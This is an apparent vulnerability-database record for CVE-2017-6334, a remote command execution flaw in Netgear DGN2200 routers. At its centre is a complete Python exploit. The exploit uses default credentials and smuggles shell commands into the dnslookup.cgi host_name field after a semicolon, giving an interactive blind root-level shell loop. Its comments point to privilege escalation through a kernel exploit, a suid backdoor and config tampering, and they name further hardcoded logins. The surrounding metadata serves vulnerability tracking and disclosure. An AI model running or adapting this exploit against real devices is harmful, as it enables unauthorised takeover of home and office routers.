ID

VAR-E-201702-0149


CVE

cve_id:CVE-2017-6334

Trust: 2.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41459

EDB ID

41459


TITLE

Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41459

DESCRIPTION

Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution. CVE-2017-6334 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41459

AFFECTED PRODUCTS

vendor:netgearmodel:dgn2200v1/v2/v3/v4scope: - version: -

Trust: 1.6

vendor:netgearmodel:dgn2200 dnslookup.cgiscope: - version: -

Trust: 0.5

vendor:netgearmodel:dgn2201 dnslookup.cgi remotescope:eqversion:v1/v2/v3/v4

Trust: 0.5

vendor:netgearmodel:dgn2200v4scope:eqversion:0

Trust: 0.3

vendor:netgearmodel:dgn2200v3scope:eqversion:0

Trust: 0.3

vendor:netgearmodel:dgn2200v2scope:eqversion:0

Trust: 0.3

vendor:netgearmodel:dgn2200v1scope:eqversion:0

Trust: 0.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41459 // EDBNET: 91308

EXPLOIT

#!/usr/bin/python

#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)

#Pozdrawiam: Kornela, Komara i Sknerusa

import sys
import requests

#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to

login = 'admin'
password = 'password'

def main():
if len(sys.argv) < 2:
print "./netgearpwn_2.py <router ip>"
return
spawnShell()

def execute(cmd): #Escaping basic sanitization
requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
return

def spawnShell():
print "Dropping a shell-like environment (blind OS injection)"
print "To test it type 'reboot'"
while True:
cmd = raw_input("[blind $] ")
execute(cmd)

if __name__ == "__main__":
main()

#2017-02-25 by SivertPL
#Tak, to ja.

Trust: 1.0

sources: EXPLOIT-DB: 41459

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 41459

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41459

TYPE

'dnslookup.cgi' Remote Command Execution

Trust: 1.6

sources: EXPLOIT-DB: 41459 // EDBNET: 91308

TAGS

tag:exploit

Trust: 1.0

tag:remote

Trust: 0.5

tag:cgi

Trust: 0.5

sources: PACKETSTORM: 143128 // PACKETSTORM: 141337

CREDITS

SivertPL

Trust: 0.6

sources: EXPLOIT-DB: 41459

EXTERNAL IDS

db:NVDid:CVE-2017-6334

Trust: 2.3

db:EXPLOIT-DBid:41459

Trust: 1.6

db:EDBNETid:91308

Trust: 0.6

db:PACKETSTORMid:143128

Trust: 0.5

db:PACKETSTORMid:141337

Trust: 0.5

db:BIDid:96463

Trust: 0.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41459 // EDBNET: 91308

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-6334

Trust: 2.0

url:https://www.exploit-db.com/exploits/41459/

Trust: 0.6

url:http://www.netgear.com

Trust: 0.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41459 // EDBNET: 91308

SOURCES

db:BIDid:96463
db:PACKETSTORMid:143128
db:PACKETSTORMid:141337
db:EXPLOIT-DBid:41459
db:EDBNETid:91308

LAST UPDATE DATE

2022-07-27T09:11:33.348000+00:00


SOURCES UPDATE DATE

db:BIDid:96463date:2017-03-07T01:08:00

SOURCES RELEASE DATE

db:BIDid:96463date:2017-02-26T00:00:00
db:PACKETSTORMid:143128date:2017-06-24T17:45:41
db:PACKETSTORMid:141337date:2017-02-26T05:55:55
db:EXPLOIT-DBid:41459date:2017-02-25T00:00:00
db:EDBNETid:91308date:2017-02-27T00:00:00